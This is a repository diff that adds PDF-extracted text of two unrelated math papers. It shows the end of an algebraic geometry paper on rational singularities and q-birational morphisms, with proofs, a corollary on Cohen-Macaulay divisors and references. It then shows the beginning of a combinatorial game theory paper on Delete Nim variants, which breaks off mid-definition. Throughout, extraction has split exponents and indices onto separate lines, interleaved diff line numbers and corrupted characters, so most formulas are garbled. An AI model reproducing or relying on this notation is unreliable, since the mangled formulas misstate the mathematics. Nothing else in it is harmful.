+ Given any point x ∈ X with codimX x ≥ q + 1, since F is (KVq) and Lemma 2.6
909
+ holds, we have Hi
910
+ f−1(x)(X′, (f ∗F)DD) = 0 for i ≤ q. By the spectral sequence (5.1), we
911
+ have the following exact sequence
912
+ 0 → H0
913
+ x(X, Rn−1f∗(f ∗F)DD) → Hn
914
+ x(X, F)
915
+ αn
916
+ → Hn
917
+ f−1(x)(X, (f ∗F)DD).
918
+ From the above exact sequence, H0
919
+ x(X, Rn−1f∗(f ∗F)DD) ∼= Hn
920
+ x (X, F) and if we use (a),
921
+ H0
922
+ x(X, Rn−1f∗(f ∗F)DD) = 0 holds.
923
+ Thus, Rn−1f∗(f ∗F)DD does not have associated
924
+ point as x. If codimX x ≤ q, since F is (RSq), (Rif∗(f ∗F))x = 0 for i ≥ 1 and hence we
925
+ have Rn−1f∗(f ∗F)DD.
926
+ For (b) =⇒ (a), since θF,f is a quasi-isomorphism at x ∈ X with codimX x ≤ q, we
927
+ have (Rif∗(f ∗F)D)x ∼= Ext− codimX x+i
928
+ OX,x
929
+ ((f ∗F)DD
930
+ x
931
+ , ω•
932
+ X,x). Hence the fact that F is (KVq)
933
+ and the local duality gives us Hi
934
+ x(X, F) = 0 for i < codimX x.
935
+ If codimX x ≥ q + 1, by inspecting the spectral sequence (5.1), Es0
936
+ 2 = Es0
937
+ ∞ for s ≤ q.
938
+ Considering the edge map Es0
939
+ ∞ → Es = Hs
940
+ f−1(x)(X′, (f ∗F)DD) for such s, if we use
941
+ Lemma 2.6, then we have the assertion.
942
+ For (a) ⇐⇒ (c), let us consider the following exact sequence
943
+ 0
944
+ f∗(f ∗F)D
945
+ F D
946
+ Q
947
+ 0
948
+ H0(θF,f )
949
+ for a coherent sheaf Q on X. Since F is (RSq), the support of Q has codimension ≥ q+1
950
+ and hence Hi
951
+ x(X, Q) = 0 for i > dim X − q.
952
+ By taking local cohomology on the above exact sequence, we have
953
+ Hi
954
+ x(X, f∗(f ∗F)D) ∼= Hi
955
+ x(X, F D) for any dim X − q < i < q and any closed point x ∈ X.
956
+ Hence, F D is (Bq+1) if and only if Hi
957
+ x(X, f∗(f ∗F)D) = 0 for any dim X − q < i < i and
958
+ any closed point x ∈ X.
959
+ Let x ∈ X be any closed point and consider the Leray spectral sequence
960
+ Est
961
+ 2 = Hs
962
+ x(X, Rtf∗(f ∗F)D) =⇒ Hs+t
963
+ f−1(x)(X′, (f ∗F)D).
964
+ Then, by the fact that F is (KVq) and the dimension counting, Est
965
+ 2 = 0 for s+t ≥ dim X−
966
+ q. Hence, by inspecting the spectral sequence, Es0
967
+ 2 = Es0
968
+ ∞ for s > dim X − q. Moreover,
969
+ Es0
970
+ ∞ = Es for s > dim X − q. Thus, F D is (Bq+1) if and only if Hi
971
+ f−1(x)(X′, (f ∗F)D) = 0
972
+
973
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
974
+ 19
975
+ for any dim X − q < i < dim X and any closed point x ∈ X. If we use Lemma 2.6, then
976
+ we have the assertion.
977
+
978
+ Remark 5.3. In Theorem 5.2, the strategy of the proof of (a) ⇐⇒ (b) is similar to the
979
+ strategy of the proof of Lemma 3.1 in [Ale08] and Proposition 7.1.7 in [Fuj17]. Moreover,
980
+ the idea of the proof of (a) ⇐⇒ (c) is inspired by the proof of Lemma 3.3 in [Kov99].
981
+ There is an interesting corollary of Theorem 5.2.
982
+ Corollary 5.4. Assume that q ≥
983
+ � dim X+1
984
+ 2
985
+
986
+ . Let X be any normal Q-factorial variety
987
+ over a characteristic 0 field and any Weil divisor on X is (RSq) and (Sq+1). Then any
988
+ Weil divisor on X is CM. In particular, X is CM itself.
989
+ Proof. Note that any Weil divisor D on X is (KVq) for any q. Since (OX(D))D is (Sq)
990
+ and OX(D) ∼= (OX(D))DD is (Bq) by Theorem 5.2, OX(D) is CM.
991
+
992
+ Remark 5.5. Corollary 5.4 proves that in the setting of char k = 0, for any factorial
993
+ variety X, if X is (RS⌈ dim X+1
994
+ 2
995
+ ⌉) and (S⌈ dim X+3
996
+ 2
997
+ ⌉), then X is CM.
998
+ One may think that Theorem 1.6 in [HO74] is similar to Corollary 5.4. Hence, if we
999
+ assume X is (Rq), one can believe that there is a simple proof of Corollary 5.4 using the
1000
+ local duality only.
1001
+ 6. q-birational morphisms
1002
+ In this section, we always assume that the field k is of characteristic 0. Let us define
1003
+ the notion of q-birational morphism.
1004
+ Definition 6.1 (See Definition 3.1, [Kim22]). Let X, X′ be any normal varieties and
1005
+ f : X′ → X any proper birational morphism.
1006
+ (a) The center of f is the reduced closed subscheme C of X which is the image of
1007
+ exceptional locus along f.
1008
+ (b) We say f is a q-birational morphism if the exceptional locus has codimension 1
1009
+ and the center of f has codimension ≥ q + 1.
1010
+ Remark 6.2. Let us remark that for any q-birational morphism f : X′ → X between
1011
+ normal varieties, if X′ is smooth, then X is (Rq).
1012
+ Let us prove the following lemma which can be regarded as a partial converse of
1013
+ Lemma 4.12.
1014
+ Lemma 6.3. Let X be any normal variety and F any reflexive sheaf on X which is
1015
+ (RSq), (KVq) and (Sq+1). Suppose f : X′ → X is any resolution and L is a line bundle
1016
+ on X′ such that there is an isomorphism F ∼= f∗L. If f is q-birational, then Rif∗L = 0
1017
+ for 1 ≤ i < q.
1018
+ Proof. We may use a similar argument as in the proof of (a) ⇐⇒ (c) in Theorem 5.2.
1019
+
1020
+ 20
1021
+ DONGHYEON KIM
1022
+ By the same argument as in the proof of Proposition 4.13, we have an injection
1023
+ (f ∗F)DD → L and hence ϕ : LD → (f ∗F)D. Let Q be the cokernel of f∗ϕ. Then
1024
+ we have the following exact sequence
1025
+ (6.1)
1026
+ 0 → f∗LD → f∗(f ∗F)D → Q → 0.
1027
+ Since f is q-birational, the support of Q has codimension ≥ q + 1.
1028
+ By taking local cohomology on (6.1), we have isomorphisms
1029
+ Hi
1030
+ x(X, LD) ∼= Hi
1031
+ x(X, f∗(f ∗F)D) for any closed point x ∈ X and any dim X−q < i < dim X.
1032
+ As in the proof of Theorem 5.2, we have Hi
1033
+ x(X, f∗(f ∗F)D) = 0 for any closed point
1034
+ x ∈ X and dim X − q < i < dim X. Hence, Hi
1035
+ x(X, LD) = 0 for such i and x ∈ X.
1036
+ Consider the Leray spectral sequence
1037
+ Est
1038
+ 2 = Hs
1039
+ x(X, Rtf∗LD) =⇒ Hs+t
1040
+ f−1(x)(X, LD).
1041
+ By inspecting the spectral sequence, we have Hi
1042
+ f−1(x)(X′, LD) = 0 for any dim X − q <
1043
+ i < dim X and any closed point x ∈ X. Now, we may apply Lemma 2.6 and obtain the
1044
+ assertion.
1045
+
1046
+ Using Lemma 6.3, we have the following theorem.
1047
+ Theorem 6.4. Let X, X′ be any normal projective varieties, X′ smooth and f : X′ → X
1048
+ any q-birational morphism. Suppose that D is any anti f-nef divisor on X′ such that
1049
+ f∗D is Q-Cartier and (Sq+1). Then Rif∗OX′(D) = 0 for 1 ≤ i < q.
1050
+ Proof. Since f∗D is Q-Cartier, we may consider a Q-divisor f ∗f∗D. If we define a divisor
1051
+ L on X′ in which OX′(L) = (f ∗OX(f∗D))DD holds, we have f ∗f∗D ∼Q L and hence
1052
+ D − L ∼Q D − f ∗f∗D is anti f-nef. Thus D − L is an effective f-exceptional divisor on
1053
+ X′ by the Negativity lemma. Therefore, by Lemma 6.3, we have the assertion.
1054
+
1055
+ We can write Theorem 6.4 as the absolute cohomology vanishing. For a similar result,
1056
+ see Corollary 3.8 in [Kim22].
1057
+ Corollary 6.5. Let X, X′ be any normal projective varieties, X′ smooth and f : X′ → X
1058
+ any q-birational morphism. Suppose that D is any anti f-nef divisor on X′ such that
1059
+ f∗D is a Q-divisor and (Sq+1) on X and E is any effective f-exceptional divisor on X′.
1060
+ Then
1061
+ Hi(X′, OX′(D + E)) = Hi(X, OX(f∗D)) = Hi(X′, OX′(D))
1062
+ for 0 ≤ i < q.
1063
+ Proof. We may use the Leray spectral sequence
1064
+ Est
1065
+ 2 = Hs(X, Rtf∗OX′(D + E)) =⇒ Hs+t(X′, OX′(D + E))
1066
+ and hence Hi(X, OX(f∗D)) = Hi(X′, OX′(D + E)) for 0 ≤ i < q by Theorem 6.4. Note
1067
+ that f∗OX′(D + E) = OX(f∗D) because of Corollary 2.7 and the fact that D + E is anti
1068
+ f-nef.
1069
+
1070
+
1071
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
1072
+ 21
1073
+ References
1074
+ [Ale08]
1075
+ V. Alexeev: Limits of stable pairs, Pure Appl. Math. Q., 4, (2008), no. 3, 767–783.
1076
+ [AH12]
1077
+ V. Alexeev and C. Hacon: Non-rational centers of log canonical singularities, J. Algebra.
1078
+ 369 (2012), 1–15.
1079
+ [Ber21]
1080
+ F. Bernasconi: Kawamata-Viehweg vanishing fails for log del Pezzo surfaces in characteristic
1081
+ 3, J. Pure Appl. Algebra 225 (2021), no. 11.
1082
+ [BH98]
1083
+ W. Bruns and H. Herzog: Cohen-Macaulay rings, Cambridge Studies in Advanced Mathe-
1084
+ matics, vol. 39, Cambridge University Press, Cambridge, 1998.
1085
+ [BK21]
1086
+ F. Bernasconi, J. Koll´ar: Vanishing theorems for threefolds in characteristic p > 5. arXiv
1087
+ preprint arXiv:2012.08343.
1088
+ [BMP+20] B. Bhatt, L. Ma, Z. Patakfalvi, K. Schwede, K. Tucker, J. Waldron and J. Witaszek: Globally
1089
+ +-regular varieties and the minimal model program for threefolds in mixed characteristic,
1090
+ arXiv preprint arXiv:2012.15801.
1091
+ [Cut09]
1092
+ S. Cutkosky: Resolution of singularities for 3-folds in positive characteristic, Amer. J. Math.
1093
+ 131 (2009), no. 1 59–127.
1094
+ [CR12]
1095
+ A. Chatzistamatiou and K. R¨ulling: Higher direct images of the structure sheaf in positive
1096
+ characteristic, Algebra & Number Theory 5 (2012), no. 6, 693–775.
1097
+ [CR15]
1098
+ A. Chatzistamatiou and K. R��ulling: Vanishing of the higher direct images of the structure
1099
+ sheaf, Compositio. Mathematica. 151 (2015), no. 11, 2131–2144.
1100
+ [Elk81]
1101
+ R. Elkik: Rationalit´e des singularit´es canoniques, Invent. Math. 64 (1981) no. 1 1–6.
1102
+ [Fuj17]
1103
+ O. Fujino: Foundations of the minimal model program, MSJ Memoirs, vol. 35, Mathematical
1104
+ Society of Japan, Tokyo, 2017.
1105
+ [Har77]
1106
+ R. Hartshorne: Algebraic Geometry, Graduate Texts in Mathematics, No. 52, Springer-
1107
+ Verlag, New York-Heidelberg, 1977.
1108
+ [Har80]
1109
+ R. Hartshorne: Stable reflexive sheaves, Math. Ann. 254 (1980), no. 2, 121–176.
1110
+ [Har94]
1111
+ R. Hartshorne: Generalized divisors on Gorenstein schemes, Proceedings of Conference on
1112
+ Algebraic Geometry and Ring Theory in honor of Michael Artin, Part III (Antwerp, 1992),
1113
+ K-Theory 8 (1994), no. 3 287–339.
1114
+ [Hir64]
1115
+ H. Hironaka: Resolution of singularities of an algebraic variety over a field of characteristic
1116
+ zero. I, II, Ann. of Math. (2) 79 (1964), 109–203; ibid. (2) 79 (1964) 205–326.
1117
+ [HO74]
1118
+ R. Hartshorne and A. Ogus: On the factoriality of local rings of small embedding codimen-
1119
+ sion, Comm. Algebra 1 (1974), 415–437.
1120
+ [HL10]
1121
+ D. Huybrechts and M. Lehn: The geometry of moduli spaces of sheaves, Cambridge Mathe-
1122
+ matical Library, Cambridge University Press, Cambridge, (2010).
1123
+ [HW19]
1124
+ C. Hacon and J. Witaszek: On the rationality of Kawamata log terminal singularities in
1125
+ positive characteristic, Algebr. Geom. 6 (2019), no. 5 516–529.
1126
+ [KMM87]
1127
+ Y. Kawamata, K. Matsuda and K. Matsuki: Introduction to the minimal model problem,
1128
+ Adv. Stud. Pure Math. 10 (1987), 283–360.
1129
+ [Kim22]
1130
+ D. Kim: q-birational morphisms and divisors, arXiv preprint arXiv:2209.07720.
1131
+ [Kol97]
1132
+ J. Koll´ar: Singularities of pairs, Algebraic geometry—Santa Cruz 1995, Proc. Sympos. Pure
1133
+ Math. 62 (1997), 221–287.
1134
+ [Kol07]
1135
+ J. Koll´ar: Lectures on Resolution of Singularities, volume 166 of Annals of Mathematics
1136
+ Studies, Princeton University Press, Princeton, 2007.
1137
+ [Kol11]
1138
+ J. Koll´ar: A local version of the Kawamata-Viehweg vanishing theorem, Pure Appl. Math.
1139
+ Q., 7, (2011), no. 4, 1477–1494.
1140
+ [Kol13]
1141
+ J. Koll´ar: Singularities of the minimal model program, Cambridge Tracts in Mathematics,
1142
+ vol. 200, Cambridge University Press, Cambridge, (2013).
1143
+
1144
+ 22
1145
+ DONGHYEON KIM
1146
+ [KM98]
1147
+ J. Koll´ar and S. Mori: Birational geometry of algebraic varieties, Cambridge Tracts in
1148
+ Mathematics, vol. 134. Cambridge University Press, Cambridge, 1998.
1149
+ [Kov99]
1150
+ S. Kov´acs: Rational, log canonical, Du Bois singularities: on the conjectures of Koll´ar and
1151
+ Steenbrink, Compositio Math 118 (1999), no. 2, 123–133,
1152
+ [Kov11]
1153
+ S. Kov´acs: Irrational centers, Pure Appl. Math. Q., 7 (2011) no. 4, Special Issue: In memory
1154
+ of Eckart Viehweg, 1495–1515.
1155
+ [Kov17]
1156
+ S. Kov´acs: Rational singularities, arXiv preprint arXiv:1703.02269.
1157
+ [Nak04]
1158
+ N. Nakayama: Zariski-decomposition and abundance, Mathematical Society of Japan, vol.
1159
+ 14, Tokyo, 2004.
1160
+ [PS14]
1161
+ Z. Patakfalvi and K. Schwede: Depth of F-singularities and base change of relative canonical
1162
+ sheaves, J. Inst. Math. Jussieu. 13 (2014), no. 1, 43–63.
1163
+ [Smi97]
1164
+ K. Smith, F-rational rings have rational singularities, Amer. J. Math. 119 (1997), no. 1,
1165
+ 159–180.
1166
+ [ST08]
1167
+ K. Schwede and S. Takagi: Rational singularities associated to pairs, Special volume in honor
1168
+ of Melvin Hochster, Michigan Math. J. 57 (2008), 625–658.
1169
+ [Stacks]
1170
+ A. J. de Jong et al., The Stacks Project, Available at http://stacks.math.columbia.edu.
1171
+ [Tot19]
1172
+ B. Totaro: The failure of Kodaira vanishing for Fano varieties, and terminal singularities
1173
+ that are not Cohen-Macaulay, J. Algebraic Geom. 28 (2019), no. 4, 751–771.
1174
+ Department of mathematics, Yonsei University, 50 Yonsei-Ro, Seodaemun-Gu, Seoul
1175
+ 03722, Korea
1176
+ Email address: whatisthat@yonsei.ac.kr
1177
+
L9E3T4oBgHgl3EQfBAkx/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
TNFLT4oBgHgl3EQfQC8d/content/tmp_files/2301.12030v1.pdf.txt ADDED
The diff for this file is too large to render. See raw diff
 
TNFLT4oBgHgl3EQfQC8d/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
WtFOT4oBgHgl3EQf7zTC/content/tmp_files/2301.12964v1.pdf.txt ADDED
@@ -0,0 +1,453 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ arXiv:2301.12964v1 [math.CO] 30 Jan 2023
2
+ Some extensions of Delete Nim
3
+ Tomoaki Abuku∗
4
+ Ko Sakai†
5
+ Masato Shinoda‡
6
+ Koki Suetsugu§
7
+ 2022
8
+ Abstract
9
+ Nim is a well-known combinatorial game with several variants, e.g.,
10
+ Delete Nim and Variant Delete Nim. In Variant Delete Nim, the player
11
+ deletes one of the two heaps of stones and splits the other heap on
12
+ his/her turn. In this paper, we discuss generalized Variant Delete Nim,
13
+ which generalizes the number of stone heaps to three or more, All-but-
14
+ one-delete Nim, Half-delete Nim, No-more-than-half-delete Nim, and
15
+ Single-delete Nim. We study the win-loss conditions for each of these
16
+ games.
17
+ 1
18
+ Introduction
19
+ Combinatorial games are 2-player games with neither chance elements nor
20
+ hidden information (for the details on combinatorial game theory, see, e.g.,
21
+ Albert et al. [3] and Siegel [7]).
22
+ Nim is one of the oldest and most well-known combinatorial games. The
23
+ basic rule of the game is that two players take turns choosing one of several
24
+ heaps and take as many tokens from the heap as they like, and the player
25
+ who cannot take a token from the heap loses. In this paper, we only deal
26
+ with the rule that a player loses if he/she cannot make any possible moves
27
+ on his/her turn. This rules is called the normal rule.
28
+ Nim is a two-player zero-sum complete information-confirmation finite
29
+ game. Since there are no draws, every position can be classified into two
30
+ ∗National Institute of Informatics, buku3416@gmail.com
31
+ †Kanagawa University, gummosakai@gmail.com
32
+ ‡Nara Women’s University, shinoda@cc.nara-wu.ac.jp
33
+ §National Institute of Informatics, suetsugu.koki@gmail.com
34
+ 1
35
+
36
+ types: N-position, in which the player whose turn it is to play has a strategy
37
+ to win the game, and P-position, in which the player whose turn it is to play
38
+ does not have a winning strategy. The distinction mentioned above between
39
+ N-positions and P-positions in Nim was shown by Bouton [4], and it is now
40
+ known that the win-loss conditions of this game contain mathematically
41
+ interesting structures. In addition, a more detailed analysis of the game has
42
+ been conducted to obtain the Sprague-Grundy values for each game. The
43
+ Sprague-Grundy values are useful for determining the winners of games that
44
+ combine multiple games. For more information on these games, refer to [3].
45
+ Variants of the game with different rules for taking tokens in Nim Moore’s
46
+ game, Welter-Sato’s game (Maya game), Wythoff’s game, etc., have been
47
+ proposed. The mathematical analysis of these games is a subject of interest.
48
+ There are also games, such as Grundy’s game, for splitting heaps of tokens.
49
+ In this paper, we propose a generalization of Delete Nim and discuss its
50
+ win-loss conditions.
51
+ This paper is organized as follows. Section 2 describes the rules of Delete
52
+ Nim; the content of this section is concerned with the case where the number
53
+ of stone heaps is two. Section 3 and beyond describe the various rules for
54
+ extending the number of stone heaps in Delete Nim to three or more and the
55
+ conditions for determining the winners. Section 3 deals with All-but-one-
56
+ delete Nim, Section 4 with No-more-than-half-delete Nim, Section 5 with
57
+ Half-delete Nim, and Section 6 with Single-delete Nim.
58
+ Note that there is a game with a rule called “Split-and-delete Nim” that
59
+ reverses the order of deleting heaps and splitting heaps (see Abuku et al.
60
+ [1]). In order to clearly distinguish between these rules, we call the rule
61
+ defined in this paper “Delete-and-split Nim”.
62
+ 2
63
+ Delete Nim
64
+ In this section, we review the rules of Delete Nim and the determination of
65
+ winners and losers as previously mentioned in Abuku and Suetsugu [2].
66
+ Definition 2.1 (The rules of Delete Nim). There are 2 heaps of tokens.
67
+ The player performs the following two operations in succession on his/her
68
+ turn.
69
+ • Selects a non-empty heap and deletes the other heap.
70
+ • Removes 1 token from the selected heap and splits the heap into two
71
+ (possibly empty heaps).
72
+ 2
73
+
74
+ The p-adic valuation of an integer n, which we shall denote by vp(n), is
75
+ the exponent of the highest power of the prime number p that divides n. In
76
+ this paper, only 2-adic valuation will be treated.
77
+ Theorem 2.2 (Abuku and Suetsugu [2]). Let ⟨x, y⟩ be a Delete Nim po-
78
+ sition, where x and y represent the number of tokens in each heap. The
79
+ Sprague-Grundy value of ⟨x, y⟩ is v2((x ∨ y) + 1), where ∨ is the bitwise
80
+ OR-operation. In particular, ⟨x, y⟩ is a P-position if and only if both x and
81
+ y are even.
82
+ The following game, called Variant Delete Nim or VDN, is defined in
83
+ Stankova and Rike [8].
84
+ Definition 2.3 (The rules of VDN). There are 2 heaps of tokens.
85
+ The
86
+ player performs the following two operations in succession on his/her turn.
87
+ • Selects one heap and deletes it.
88
+ • Splits the remaining heap into 2 (non-empty) heaps.
89
+ VDN and Delete Nim are equivalent games with respect to legal moves.
90
+ We can see that the position ⟨x, y⟩ of VDN corresponds to the position
91
+ ⟨x − 1, y − 1⟩ of Delete Nim. Therefore, according to Theorem 2.2, in VDN,
92
+ the condition that each member of the pair ⟨x, y⟩ be odd is required for ⟨x, y⟩
93
+ to be a P-position. This decision condition is also included in Theorem 3.2
94
+ of this paper.
95
+ In the following sections, we will consider various rules when the number
96
+ of token heaps n is generalized to 3 or more. The extended rules discussed
97
+ below all follow the VDN setting, where some of the n heaps of tokens are
98
+ deleted and the remaining heaps are split, and the number of heaps n before
99
+ and after the turn is assumed to remain the same. Also, when splitting a
100
+ heap of tokens every heap must contain at least one token.
101
+ The two operations that a player performs in a turn (deleting and split-
102
+ ting a heap) are called a move, and a position that can be transitioned from
103
+ one position to another by a single move is called an option. A position that
104
+ has no option is called a terminal position, and the player whose turn it is
105
+ to play in this terminal position loses the game.
106
+ 3
107
+ All-but-one-delete Nim
108
+ In this section, we introduce a variant of delete nim, All-but-one-delete
109
+ Nim or ABO-delete Nim. In this ruleset, all heaps except for one heap are
110
+ removed in a move.
111
+ 3
112
+
113
+ 3.1
114
+ The rule of ABO-delete Nim
115
+ Definition 3.1 (ABO-delete Nim). There are n heaps of tokens. The player
116
+ performs the following two operations in succession on his/her turn.
117
+ • Selects n − 1 heaps and deletes them.
118
+ • Splits the remaining 1 heap into n heaps.
119
+ The set of all positions in ABO-delete Nim is Gn = {⟨z1, z2, . . . , zn⟩ |
120
+ z1, z2, . . . , zn ∈ N}. If n = 2, then the ruleset is the same as VDN. Therefore,
121
+ ABO-delete Nim can be considered as a generalization of VDN. From Defini-
122
+ tion 3.1, the set of terminal positions of ABO-delete Nim is {⟨z1, z2, . . . , zn⟩ |
123
+ 1 ≤ z1, z2, . . . , zn ≤ n − 1}.
124
+ 3.2
125
+ Characterizing positions of ABO-delete Nim
126
+ Theorem 3.2. All-but-one-delete Nim position ⟨z1, z2, . . . , zn⟩ is a P-position
127
+ if and only if
128
+ (*) for every i, the remainder of zi divided by n(n − 1) is between 1 and
129
+ n − 1.
130
+ Note that this theorem generalizes Theorem 2.2.
131
+ Proof. Let Gn = {⟨z1, z2, . . . , zn⟩ | z1, z2, . . . , zn ∈ N}, P be the subset of
132
+ Gn, which satisfies (*), and N = Gn \P. Obviously, P contains the terminal
133
+ positions of ABO-delete Nim and this game is not a loopy game. Therefore,
134
+ it is enough to show (i) every position in P has no option in P and (ii) every
135
+ position in N has at least one option in P.
136
+ (i) Assume that Z = ⟨z1, z2, . . . , zn⟩ ∈ P and Z′ = ⟨z′
137
+ 1, z′
138
+ 2, . . . , z′
139
+ n⟩ is an
140
+ option of Z. Then there exists i such that zi = z′
141
+ 1 +z′
142
+ 2 +· · · +z′
143
+ n. Therefore,
144
+ from (*), the reminder of z′
145
+ 1 + z′
146
+ 2 + · · · + z′
147
+ n divided by n(n − 1) is larger
148
+ than 0 and less than n. On the other hand, if z′
149
+ 1, z′
150
+ 2, . . . , z′
151
+ n satisfies (*), then
152
+ the sum of reminders of z′
153
+ 1, z′
154
+ 2, . . . , z′
155
+ n is between n and n(n − 1), which is a
156
+ contradiction. Thus, Z′ ̸∈ P.
157
+ (ii) Assume that Z = ⟨z1, z2, . . . , zn⟩ ∈ N. Then, there exists zi whose
158
+ reminder divided by n(n − 1) is larger than or equal to n (Here, we say the
159
+ reminder is n(n−1) if zi can be divided by n(n−1)). By removing all heaps
160
+ except for this heap and splitting this heap into n heaps, one can have a
161
+ position in P.
162
+ How to split the heap into n heaps at the last of the proof will be pre-
163
+ sented in Lemma 5.5(2).
164
+ 4
165
+
166
+ 4
167
+ No-more-than-half-delete Nim
168
+ Next, we introduce No-more-than-half-delete Nim or NMTH-delete Nim. In
169
+ this ruleset, the player removes no more than half heaps of all heaps in a
170
+ move.
171
+ 4.1
172
+ The rule of NMTH-delete Nim
173
+ Definition 4.1 (NMTH-delete Nim). There are n heaps of tokens. The
174
+ player performs the following two operations in succession on his/her turn.
175
+ • Chooses a positive integer k such that k ≤ n
176
+ 2, selects k heaps, and
177
+ deletes them.
178
+ • Selects k heaps of the remaining n − k heaps and splits each heap into
179
+ two heaps.
180
+ Note that if n = 2, then the rule is the same as VDN and if n = 3,
181
+ then the rule is the same as single delete nim with the number of heaps is
182
+ 3, presented in Section 6.
183
+ 4.2
184
+ Characterizing positions in NMTH-delete Nim
185
+ We found following theorem for NMTH-delete Nim.
186
+ Theorem 4.2. No-more-than-half-delete Nim position ⟨z1, z2, . . . , zn⟩ is a
187
+ P-position if and only if z1, z2, . . . , zn satisfy the following condition:
188
+ (i) v2(z1) = v2(z2) = · · · = v2(zn) = 0 if n is even,
189
+ (ii) v2(z1) = v2(z2) = · · · = v2(zn) if n is odd.
190
+ For proving this theorem, we prepare following propositions. They are
191
+ trivial, so we omit the proof.
192
+ Proposition 4.3. For x, y, z ∈ N, if x + y = z, then following (i) and (ii)
193
+ holds.
194
+ (i) If v2(x) = v2(y), then v2(z) > v2(x).
195
+ (ii) If v2(x) ̸= v2(y), then v2(z) = min{v2(x), v2(y)}.
196
+ Proposition 4.4. Assume that z ∈ N and v2(z) > 0. For any nonnegative
197
+ integer k < v2(z), there exist x, y ∈ N such that x + y = z and v2(x) =
198
+ v2(y) = k.
199
+ 5
200
+
201
+ For instance, (x, y) = (z −2k, 2k) satisfies x+y = z and v2(x) = v2(y) =
202
+ k.
203
+ In the rest of this paper, we say a heap is even (resp. odd) heap if the
204
+ number of stones of the heap is an even (resp. odd) number.
205
+ Proof of Theorem 4.2. Let Pe be the set of positions in which every heap is
206
+ an odd heap and Ne be the set of positions in which at least one heap is
207
+ an even heap. We also let Po be the set of positions such that every 2-adic
208
+ valuation of the size of a heap is the same number and No be the set of
209
+ positions with several different 2-adic valuations of the size of a heap.
210
+ (i) Assume that n is an even number. Since there are one even heap and
211
+ one odd heap after an odd heap is split, a position in Pe has no option in Pe.
212
+ Next, consider a position in Ne. If the number of even heaps is larger than
213
+ or equal to n
214
+ 2 , then by deleting heaps other than n
215
+ 2 even heaps and splitting
216
+ the remaining even heaps into odd heaps, one can obtain a position in Pe.
217
+ If there are less than n
218
+ 2 even heaps, then by deleting the same number of
219
+ odd heaps as even heaps and splitting all even heaps into odd heaps, one
220
+ can obtain a position in Pe.
221
+ (ii) Assume that n is an odd number. Then, after one move, at least one
222
+ heap remains undeleted and unsplit. From the contraposition of proposition
223
+ 4.3, if one heap is split, then at least one 2-adic valuation of the heaps is
224
+ differ from 2-adic valuation of the original heap. Therefore, every position
225
+ in Po has no option in Po. Next, in position ⟨z1, z2, . . . , zn⟩ ∈ No, assume
226
+ that v2(z1) ≤ v2(z2) ≤ · · · ≤ v2(zn) and v2(z1) ̸= v2(zn) and we show that
227
+ from this position one can obtain a position in Po in a single move. If the
228
+ number of j such that v2(z1) < v2(zj) is less than or equal to n−1
229
+ 2 , then from
230
+ Proposition 4.4, one can split every heap whose 2-adic valuation is larger
231
+ than v2(z1) into two heaps whose 2-adic valuations are v2(z1). For the other
232
+ cases, one can split n−1
233
+ 2
234
+ heaps whose 2-adic valuations are larger than v2(z1)
235
+ into n − 1 heaps whose 2-adic valuations are v2(z1).
236
+ 5
237
+ Half-delete Nim
238
+ In this section, we introduce Half-delete Nim. In this ruleset, differ from
239
+ NMTH-delete nim, the player removes just half heaps of all heaps in a move,
240
+ so the number of heaps in this ruleset must be an even number. We also
241
+ introduce a generalization of this ruleset.
242
+ 6
243
+
244
+ 5.1
245
+ The rule of Half-delete Nim
246
+ Definition 5.1 (Half-delete Nim). There are n (= 2m) heaps of tokens.
247
+ The player performs the following two operations in succession on his/her
248
+ turn.
249
+ • Selects m heaps and deletes them.
250
+ • Splits each of the remaining m heaps into two heaps.
251
+ In particular, if n = 2, this game is the same as VDN.
252
+ 5.2
253
+ Characterizing positions in Half-delete Nim
254
+ Theorem 5.2. Let Z = ⟨z1, z2, . . . , z2m⟩ be a Half-delete Nim position,
255
+ where each zi is the number of tokens and zi ≤ zi+1 for any i. Let 2s be the
256
+ smallest power of 2 greater than zm+1. Then Z is a P-position if and only
257
+ if z1, z2, . . . , z2m satisfy both of the following two conditions:
258
+ (a) all z1, z2, . . . , zm+1 are odd,
259
+ (b) For any l, if zl is even, then 2s ≤ zl.
260
+ This theorem is a special case of Theorem 5.6 in the next subsection, so
261
+ the proof is omitted.
262
+ 5.3
263
+ k−1
264
+ k n-delete nim
265
+ We consider a generalization of Half-delete Nim.
266
+ Definition 5.3 (k−1
267
+ k n-delete Nim). There are n (= km) heaps of tokens.
268
+ The player performs the following two operations in succession on his/her
269
+ turn.
270
+ • Selects (k − 1)m heaps and deletes them.
271
+ • Splits each of the remaining m heaps into k heaps.
272
